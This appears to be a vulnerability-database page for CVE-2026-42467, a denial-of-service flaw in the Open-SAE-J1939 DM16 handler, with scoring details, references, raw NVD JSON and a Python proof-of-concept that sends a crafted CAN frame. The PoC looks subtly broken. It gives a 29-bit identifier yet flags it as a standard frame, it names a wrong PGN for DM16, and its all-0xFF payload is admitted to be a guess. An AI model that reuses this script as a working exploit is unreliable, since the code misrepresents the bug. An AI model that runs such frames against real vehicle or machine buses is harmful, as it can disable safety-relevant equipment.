CVE-2026-42467

Description

An issue was discovered in Open-SAE-J1939 thru commit b6caf884df46435e539b1ecbf92b6c29b345bdfe (2025-11-30) in SAE_J1939_Read_Binary_Data_Transfer_DM16 causing a denial of service via crafted CAN frame on the J1939 bus.

CVSS Details

CVSS Score

7.5

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

No configuration data available.

Open-SAE-J1939 <= commit b6caf884df46435e539b1ecbf92b6c29b345bdfe

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import can

# PoC for CVE-2026-42467: Open-SAE-J1939 DoS
# This script sends a crafted CAN frame targeting the DM16 handler.
# Replace 'vcan0' with the actual CAN interface.

def send_exploit_frame():
    # Initialize the bus interface
    bus = can.interface.Bus(channel='vcan0', bustype='socketcan')

    # Crafted CAN ID for DM16 (Binary Data Transfer)
    # PGN for DM16 is typically 0x00D900 (Data Transfer - Binary)
    # Priority: 6, PGN: 0x00D900, Source Address: 0x01
    can_id = 0x18D90101

    # Malicious payload designed to trigger the parsing bug
    # The specific byte sequence may vary based on the exact vulnerability trigger
    data = [0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF]

    msg = can.Message(arbitration_id=can_id, data=data, is_extended_id=False)

    print("Sending malicious CAN frame...")
    try:
        bus.send(msg)
        print("Frame sent successfully.")
    except can.CanError:
        print("Error sending frame.")

    bus.shutdown()

if __name__ == "__main__":
    send_exploit_frame()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-42467
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-42467
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-42467/
[4] VulDB https://vuldb.com/cve/CVE-2026-42467
[5] https://gist.github.com/sgInnora/f4ac66faeefe07a653ceeb3f58cdc381

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-42467", "sourceIdentifier": "[email protected]", "published": "2026-05-01T17:16:25.027", "lastModified": "2026-05-05T20:24:04.853", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "An issue was discovered in Open-SAE-J1939 thru commit b6caf884df46435e539b1ecbf92b6c29b345bdfe (2025-11-30) in SAE_J1939_Read_Binary_Data_Transfer_DM16 causing a denial of service via crafted CAN frame on the J1939 bus."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-400"}]}], "references": [{"url": "https://gist.github.com/sgInnora/f4ac66faeefe07a653ceeb3f58cdc381", "source": "[email protected]"}]}}